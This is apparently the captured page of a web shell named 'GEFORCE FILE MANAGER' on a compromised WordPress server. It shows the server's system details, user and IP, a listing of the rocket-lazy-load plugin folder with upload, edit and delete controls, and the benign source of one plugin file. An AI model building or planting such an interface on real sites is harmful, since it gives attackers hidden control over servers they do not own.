[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
rocket-lazy-load
/
src
/
ServiceProvider
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 ImagifyNoticeServiceProvider.php
708 B
SET
[ EDIT ]
|
[ DEL ]
📄 LazyloadServiceProvider.php
700 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: ImagifyNoticeServiceProvider.php
<?php /** * Service Provider for the imagify notice class * * @package RocketLazyload */ namespace RocketLazyLoadPlugin\ServiceProvider; use RocketLazyLoadPlugin\Dependencies\LaunchpadCore\Container\AbstractServiceProvider; use RocketLazyLoadPlugin\Dependencies\League\Container\Definition\DefinitionInterface; /** * Adds the Imagify notice to the container */ class ImagifyNoticeServiceProvider extends AbstractServiceProvider { public function define() { $this->register_service( \RocketLazyLoadPlugin\Admin\ImagifyNotice::class ) ->set_definition( function ( DefinitionInterface $instance ) { $instance->addArguments( [ 'template_path', ] ); } ); } }